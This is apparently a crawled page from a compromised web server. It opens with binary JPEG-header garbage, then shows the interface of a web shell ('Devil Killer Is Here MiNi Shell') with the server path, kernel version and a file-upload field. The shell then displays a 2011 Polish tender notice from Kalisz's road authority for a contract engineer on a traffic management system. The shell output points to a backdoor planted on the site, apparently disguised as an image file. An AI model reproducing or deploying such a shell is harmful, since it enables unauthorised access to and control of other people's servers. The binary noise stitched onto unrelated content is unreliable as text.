JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111102/286631-N-2011.html

<p class="kh_header"><b>Kalisz: Pełnienie funkcji Inżyniera Kontraktu przy realizacji zadania pn.: Opracowanie dokumentacji technicznej oraz wykonanie robót budowlano - montażowych w formule zaprojektuj i wybuduj dla zadania pn.: Budowa Zintegrowanego Systemu Zatrządzania Ruchem Drogowym w Kaliszu - etap I.</b><br>
<b>Numer ogłoszenia: 286631 - 2011; data zamieszczenia: 02.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg  Miejskich , ul. Złota 43, 62-800 Kalisz, woj. wielkopolskie, tel. 62 59 85 200, faks 62 59 85 201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdm.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu przy realizacji zadania pn.: Opracowanie dokumentacji technicznej oraz wykonanie robót budowlano - montażowych w formule zaprojektuj i wybuduj dla zadania pn.: Budowa Zintegrowanego Systemu Zatrządzania Ruchem Drogowym w Kaliszu - etap I..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zgodnie z pkt. 4 siwz: 
Przedmiotem zamówienia jest: 
       Pełnienie funkcji Inżyniera Kontraktu przy realizacji zadania pn.:                   
       Opracowanie dokumentacji technicznej oraz wykonanie robót budowlano - 
      montażowych w formule zaprojektuj i wybuduj dla zadania pn.: Budowa 
      Zintegrowanego Systemu Zatrządzania Ruchem Drogowym w Kaliszu - etap I 
      polegajacego na zaprojektowaniu i budowie: Zintegrowanego Systemu Zarządzania 
      Ruchem Drogowym w Kaliszu - etap I w oparciu o Program Funkcjonalno-Użytkowy oraz 
      Uszczegółowienie Programu Funkcjonalno-Użytkowego (stanowiące załączniki odpowiednio 
      nr 1 i 2 do SIWZ), na który składają się następujące elementy podsystemów:
- podsystem monitorowania i zarządzania sygnalizacją świetlną,
- podsystem optymalizacji ruchu dla arterii miejskich,
- podsystem monitorowania wideo skrzyżowań,
- podsystem tablic znakowych zmiennej treści,
- podsystem wykrywania i rejestrowania pojazdów przekraczających dopuszczalny nacisk osi,
- podsystem dystrybucji danych ruchowych,
- podsystem rejestracji pojazdów przekraczających dozwoloną średnią prędkość przejazdu na odcinku drogi,
- podsystem rejestracji pojazdów przejeżdżających na czerwonym sygnale przez   sygnalizację świetlną,
- podsystem automatycznego zliczania pojazdów z podziałem na kategorie,
- podsystem wykrywania pojazdów poszukiwanych.

Zakres prac projektowych i budowlano-montażowych objętych nadzorem inwestorskim obejmuje w szczególności:

Faza I - opracowanie dokumentacji projektowej:
- dane wyjściowe do projektowania, które zostaną spisane w terminie 14 dni od dnia podpisania umowy,
- opracowanie projektów budowlano-wykonawczych (w tym m. in.projekty budowlane drogowe, elektryczne, organizacji ruchu wraz z programami sterowania sygnalizacją świetlną, projekty organizacji ruchu na czas wykonywania robót budowlano-montażowych, projekty koordynacji sygnalizacji, projekt kanalizacji teletechnicznej, projekty usunięcia ewentualnych kolizji, projekt adaptacji pomieszczeń w siedzibie ZDM w Kaliszu na Centrum Sterowania Ruchem wraz z wyposażeniem), w zakresie niezbędnym do uzyskania pozwolenia na budowę lub dokonania zgłoszenia robót nie wymagających zgłoszenia na budowę,
- decyzję o środowiskowych uwarunkowaniach zgody na realizację inwestycji (jeśli będzie wymagana),
- wszystkie niezbędne uzgodnienia branżowe,
- opinię Zespołu Uzgadniania Dokumentacji Projektowych; w przypadku gdy realizacja zadania nie wymaga pozwolenia na budowę, do wniosku o opinię ZUDP należy dołączyć sporządzoną przez projektanta notatkę zaakceptowaną przez Zarząd Dróg Miejskich w Kaliszu, informującą o nie wymaganiu pozwolenia na budowę,
- uzyskanie opinii Wojewódzkiego Urzędu Ochrony Zabytków w Poznaniu Delegatura w Kaliszu oraz w przypadku nałożenia takiego obowiązku uzyskanie zgody na prowadzenie prac budowlanych na terenie wpisanym do rejestru zabytków,
- informację do planu BIOZ,
- uzyskanie pozwolenia na budowę, ewentualnie przygotowanie wszystkich materiałów         
   i dokonanie zgłoszenia robót niewymagających pozwolenia na budowę,
- przygotowanie wniosku o zezwolenie na realizację inwestycji drogowej (SPEC USTAWA) w przypadku gdy rozwiązanie wykracza poza pas drogowy,
- przedmiar robót, ślepy kosztorys zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem, wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem ilości jednostek miar robót przedstawionych oraz wskazaniem podstaw do ustalenia cen jednostkowych robót,
- kosztorys inwestorski sporządzony oddzielnie dla każdego projektu 
na podstawie obowiązujących w tym zakresie przepisów,
- szczegółową specyfikację techniczną wykonania i odbioru robót,
- opracowanie przedmiotu zamówienia w formie papierowej oraz elektronicznej (format   PDF ),
- opracowanie szczegółowego harmonogramu rzeczowo-finansowego realizacji  robót budowlano-montażowych,
- pełnienie nadzoru autorskiego.

Faza II - budowa Zintegrowanego Systemu Zarządzania Ruchem Drogowym 
w Kaliszu:
Wykonanie, dostawa i montaż zgodnie z opracowaną dokumentacją zaprojektowanych elementów w szczegolności:
- przygotowanie i wyposażenie pomieszczeń CSR (sprzęt, urządzenia, oprogramowanie),
- wykonanie oznakowania tymczasowego na czas prowadzenia robót budowlano-montażowych,
- budowa kanalizacji teletechnicznej wraz z ułożeniem światłowodu,
- przebudowa (zmiana geometrii, przebudowa i wymiana nawierzchni) wskazanych skrzyżowań objętych Systemem,
- modernizacja i przebudowa istniejących sygnalizacji świetlnych,
- wykonanie wideo monitoringu skrzyżowań,
- dostawa i montaż tablic tekstowych zmiennej treści,
- wybudowanie wag wstępnego ważenia wraz z budową parkingu umożliwiającego dokonanie pomiaru ciężaru pojazdów oraz dostawa wagi przenośnej,
- budowa punktów dokładnego pomiaru liczby przejeżdżających pojazdów,
- podłączenie poszczególnych elementów Systemu do CSR,
- przeszkolenie personelu obsługującego podsystem monitorowania i zarządzania sygnalizacją świetlną,
- obsługa geodezyjna robót budowlanych wraz z geodezyjną inwentaryzacją powykonawczą,
- dokumentacja eksploatacyjna, powykonawcza.

4.2. Szczegółowy zakres prac w ramach pełnionej funkcji obejmuje:
4.2.1.	Nadzór w zakresie prac projektowych i budowlano-montażowych oraz związanych z procesem realizacji projektu uwzględniający w szczególności:

4.2.1.1.	zorganizowanie biura wykonawcy w Kaliszu,
4.2.1.2.	uzyskanie od wykonawcy finansowego zabezpieczenia kontraktu, ubezpieczeń, certyfikatów materiałowych i innych niezbędnych dokumentów,
4.2.1.3.	nadzór, kontrola i egzekwowanie terminowej realizacji Projektu (w tym monitoring postępów w realizacji poszczególnych elementów składających się na całość zadania) - zgodnie z opracowanym przez wykonawcę robót projektowych                   i budowlano-montażowych i zaakceptowanym przez zamawiającego harmonogramem rzeczowo-finansowym,
4.2.1.4.	uzyskanie od wykonawcy opracowanych przez niego projektów wraz z wszelkimi wymaganymi opiniami, uzgodnieniami, pozwoleniami i innymi dokumentami wymaganymi przepisami szczegółowymi,
4.2.1.5.	dokonanie sprawdzenia opracowanych projektów pod kątem kompletności, prawidłowości przyjętych rozwiązań zapewniającymi osiągnięcie zakładanych celów i funkcjonalności, zgodności z obowiązującymi przepisami i normami,
4.2.1.6.	wyegzekwowanie od wykonawcy dokonania niezbędnych korekt i poprawek               w przypadku stwierdzenia podczas weryfikacji wad dokumentacji projektowej (całości lub jej poszczególnych części) wraz z ponowną weryfikacją poprawionej dokumentacji,
4.2.1.7.	przekazanie zamawiającemu dokumentacji projektowej w celu jej zatwierdzenia,
4.2.1.8.	kontrola i egzekwowanie uzyskania przez wykonawcę prac projektowych wymaganych pozwoleń na budowę lub dokonania zgłoszeń dla robót niewymagających pozwolenia na budowę,
4.2.1.9.	przekazanie wykonawcy robót budowlano-montażowych terenu lub części terenu budowy (w zależności od potrzeb) w celu realizacji przewidzianych dokumentacją prac,
4.2.1.10.	zapewnienie realizacji zadania zgodnie z opracowaną i zatwierdzoną dokumentacją projektową, przepisami polskiego Prawa budowlanego oraz obowiązującymi normami,
4.2.1.11.	zapewnienie realizacji zadania zgodnie z zawartą umową o dofinansowanie realizacji projektu oraz obowiązującymi przepisami i wytycznymi dotyczącymi projektów współfinansowanych ze środków UE w ramach Programu Operacyjnego Infrastruktura i Środowisko na lata 2007-2013,
4.2.1.12.	nadzór i kontrola nad zgodnością realizacji robót budowlanych z opracowanym przez Kierownika budowy planem BIOZ, wymaganiami dotyczącymi bezpieczeństwa przeciwpożarowego, przepisów związanych z ochroną środowiska oraz ochroną zabytków (w tym, w przypadku stwierdzenia takiej konieczności zapewnienie właściwego nadzoru archeologicznego nad realizowanymi pracami),
4.2.1.13.	współpraca z Zamawiającym w egzekwowaniu postanowień umowy na roboty projektowe i budowlano-montażowe,
4.2.1.14.	prowadzenie nadzoru inwestorskiego przez zespół specjalistów posiadających odpowiednie uprawnienia i certyfikaty wymagane przez polskie Prawo budowlane,
4.2.1.15.	organizowanie cyklicznych narad koordynacyjnych co najmniej jeden raz                   w miesiącu a w razie potrzeby lub na życzenie zamawiającego częściej wraz             ze sporządzeniem protokołów ze spotkań i dostarczeniem ich uczestnikom spotkań,
4.2.1.16.	zapewnienie obecności na budowie Inżyniera Rezydenta oraz branżowych inspektorów nadzoru w wymiarze gwarantującym prawidłową realizację robót,
4.2.1.17.	zatwierdzanie wykonywanych robót wraz z robotami zanikającymi i ulegającymi zakryciu w ramach prowadzonego nadzoru inwestorskiego,
4.2.1.18.	kontrolowanie i zatwierdzanie jakości wykonanych robót i wbudowywanych materiałów i ich zgodności z wymaganiami zamawiającego, obowiązującymi normami, przepisami i specyfikacjami technicznymi
4.2.1.19.	kwalifikowanie materiałów z rozbiórki pod kątem przydatności do ponownego wbudowania,
4.2.1.20.	współpraca z nadzorem autorskim,
4.2.1.21.	rozwiązywanie w porozumieniu z zamawiającym bieżących problemów formalnych lub technicznych powstałych w trakcie realizacji zadania,
4.2.1.22.	szacowanie i weryfikowanie robót dodatkowych i zamiennych zaproponowanych przez wykonawcę w zakresie wartości fizycznych i finansowych,
4.2.1.23.	sporządzanie protokołów konieczności w przypadku stwierdzenia konieczności wykonania robót dodatkowych lub zamiennych, uzasadnienie konieczności wykonania tych prac oraz wnioskowanie do zamawiającego o ich wykonanie,
4.2.1.24.	uzgadnianie z zamawiającym wszelkich zmian dotyczących zakresu i wartości robót,
4.2.1.25.	uczestniczenie w dokonywanych przez wykonawcę robót projektowych                          i budowlano-montażowych badaniach, testach, próbach oraz sprawdzeniach                i weryfikacja uzyskanych na ich podstawie wyników,
4.2.1.26.	dokonywanie odbiorów częściowych i odbioru końcowego wykonanych prac oraz przygotowanie dokumentacji niezbędnej do prawidłowego przebiegu ww. odbiorów,
4.2.1.27.	uzyskanie i weryfikacja dokumentacji powykonawczej, dokumentacji eksploatacyjnej, instrukcji obsługi i konserwacji oraz innych dokumentacji technicznych których obowiązek wykonania wynikać będzie z warunków realizacji umowy na projekt i roboty budowlano-montażowe,
4.2.1.28.	przekazanie zamawiającemu kompletu dokumentów wymaganych do zgłoszenia zakończenia budowy do organu nadzoru budowlanego i uzyskania pozwolenia na użytkowanie, z uwzględnieniem wymagań wynikających z art. 56 i 57 prawa budowlanego,
4.2.1.29.	doradztwo i prowadzenie w imieniu zamawiającego spraw związanych                           z roszczeniami lub sporami dotyczącymi realizacji umowy na zaprojektowanie                   i budowę ZSZRD w Kaliszu oraz z problemami mogącymi pojawić się podczas realizacji robót,
4.2.1.30.	umieszczenie na placu budowy tablic informacyjnych i pamiątkowych zgodnie z umową                          o dofinansowanie projektu oraz z wytycznymi określonymi przez Instytucję Zarządzającą Programem Operacyjnym Infrastruktura i Środowisko na lata 2007-2013,
4.2.1.31.	tworzenie dokumentacji fotograficznej w trakcie prowadzenia robót budowlano-montażowych,
4.2.1.32.	informowanie zamawiającego na bieżąco o postępach w realizacji robót, stwierdzonych nieprawidłowościach lub zagrożeniach w realizacji                           prac projektowych jak i robót budowlano-montażowych wynikających                                 z zatwierdzonego przez zamawiającego harmonogramu rzeczowo-finansowego oraz informowanie o sposobach ich rozwiązywania i/lub działaniach korygujących, mającymi na celu usuwanie tych problemów,
4.2.1.33.	uczestniczenie w kontrolach Instytucji Zarządzającej POIS na lata 2007-2013, wyjaśnianie wątpliwości, przygotowywanie pisemnych wyjaśnień (jeśli taka konieczność zaistnieje),
4.2.1.34.	uczestniczenie w przeglądach gwarancyjnych,
4.2.1.35.	wszystkie inne czynności i zadania niewymienione w niniejszym zakresie zadań (punkt 1.1), które okażą się konieczne dla prawidłowej realizacji zadania (zgodnie                 z wymaganiami określonymi w umowie o dofinansowanie projektu oraz wytycznymi Instytucji Zarządzającej POIS na lata 2007-2013 i zamawiającego) oraz zabezpieczenia interesów zamawiającego.

4.2.2.	Nadzór w zakresie monitorowania oraz rozliczania finansowego projektu uwzględniający w szczególności:
4.2.2.1.	utrzymywanie na bieżąco łączności i sprawozdawczości między wszystkimi uczestnikami Projektu, łącznie z Instytucją Zarządzającą i zamawiającym,
4.2.2.2.	opracowywanie harmonogramów przepływów finansowych i prognoz przepływów gotówkowych dla potrzeb realizowanego zadania oraz sporządzanie wniosków                o płatność dla zamawiającego,
4.2.2.3.	sporządzanie dla zamawiającego okresowych (zgodnie z wymaganiami Instytucji Zarządzającej POIS na lata 2007-2013) raportów, sprawozdań,
4.2.2.4.	dokonanie pełnego rozliczenia końcowego zadania oraz rozliczenia poszczególnych etapów zgodnie z zawartą umową na dofinansowanie realizacji projektu oraz z wymogami określonymi przez Instytucję Zarządzającą POIS              na lata 2007-2013,
4.2.2.5.	przestrzeganie procedur związanych z zarządzaniem projektami współfinansowanymi ze środków UE wraz ze sprawdzeniem i zatwierdzeniem harmonogramów rzeczowo-finansowych realizacji Projektu,

4.2.2.6.	wszystkie inne czynności i zadania niewymienione w niniejszym zakresie zadań (punkt 1.2), które okażą się konieczne dla prawidłowej realizacji zadania (zgodnie z wymaganiami określonymi w umowie o dofinansowanie realizacji projektu oraz wymaganiami Instytucji Zarządzającej POIS na lata 2007-2013                                   i zamawiającego) oraz zabezpieczenia interesów zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.80.00-8, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 5.000,00 PLN
         ( pięć tysięcy złotych 00/100) przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykażą, w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonanie z należytą 
   starannością wykonanie (łącznie) minimum:
a) jednej usługi polegającej na prowadzeniu nadzoru inwestycji realizowanej w formule
    zaprojektuj i wybuduj o wartości zadania nadzorowanego min. 3 mln zł,
b) trzech usług obejmujących nadzór nad budową lub przebudową skrzyżowania 
              dróg, z których co najmniej jedna stanowi drogę klasy min. Z,
c) trzech usług obejmujących nadzór nad budową lub przebudową sygnalizacji 
                akomodacyjnych na skrzyżowaniach dróg z których co najmniej jedna stanowi drogę 
     klasy min. Z,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Skład zespołu Inżyniera Kontraktu:
a) Inżynier Rezydent (1 osoba) - wymagania - wykształcenie wyższe budowlane, uprawnienia  budowlane bez ograniczeń w specjalności drogowej lub równoważne , minimum 5-cio letnie doświadczenie na stanowiskach kierowniczych w bezpośrednim zarządzaniu lub nadzorowaniu realizacji inwestycji w zakresie infrastruktury drogowej bądź też w zakresie systemów sterowania ruchem, przynależność do Izby Inżynierów Budownictwa (aktualny wpis), doświadczenie w kierowaniu kontraktami finansowanymi przez UE lub Międzynarodowe Instytucje Finansowe: co najmniej jedna inwestycja o wartości nie mniejszej niż 3 mln PLN (brutto),


b) Inspektor robót drogowych (1 osoba) - wymagania - wykształcenie wyższe, uprawnienia budowlane bez ograniczeń w specjalności drogowej lub równoważne, minimum 5-cio letnie doświadczenie w kierowaniu lub nadzorowaniu robotami drogowymi, przynależność do Izby Inżynierów Budownictwa (aktualny wpis), doświadczenie w kierowaniu lub nadzorowaniu  inwestycji o wartości nie mniejszej niż 3 mln PLN (brutto)

c) Inspektor ds. sieci i systemów informatycznych (1 osoba) - wymagania - wykształcenie wyższe z zakresu informatyki lub telekomunikacji, minimum 3 letnie doświadczenie                            w kierowaniu lub nadzorowaniu realizacji projektów  z zakresu wdrażania rozwiązań sieciowych oraz informatycznych systemów nadzoru i kontroli,

d) Inspektor ds. inżynierii ruchu (1 osoba) - wykształcenie wyższe techniczne minimum 3 letnie doświadczenie w projektowaniu, wdrażaniu programów sygnalizacji świetlnej; znajomość oprogramowania do projektowania i modelowania ruchu drogowego,

e) Inspektor robót elektrycznych (1 osoba) - wykształcenie wyższe, uprawnienia budowlane bez ograniczeń do projektowania i kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych lub równoważne, minimum 3 letnie doświadczenie, przynależność do Izby Inżynierów Budownictwa (aktualny wpis),
f) Inspektor robót telekomunikacyjnych (1 osoba) - wykształcenie wyższe, uprawnienia budowlane bez ograniczeń do projektowania i kierowania robotami budowlanymi w specjalności telekomunikacyjnej lub równoważne, minimum 3 letnie doświadczenie, przynależność do Izby Inżynierów Budownictwa (aktualny wpis),

g) Specjalista ds. rozliczeń (1 osoba) - wymagania - wykształcenie wyższe, minimum 4 letnie doświadczenie zawodowe w kosztorysowaniu robót budowlanych, doświadczenie w rozliczaniu    i sprawozdawczości na co najmniej jednym przedsięwzięciu, dotyczącym robót budowlanych współfinansowanych ze środków unijnych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykażą posiadanie środków finansowych lub zdolności kredytowej w wysokości minimum 
   1.000.000,00 zł PLN. 

-  wykażą, że posiadają (aktualne i opłacone przynajmniej na dzień składania ofert)
   ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
   gospodarczej związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

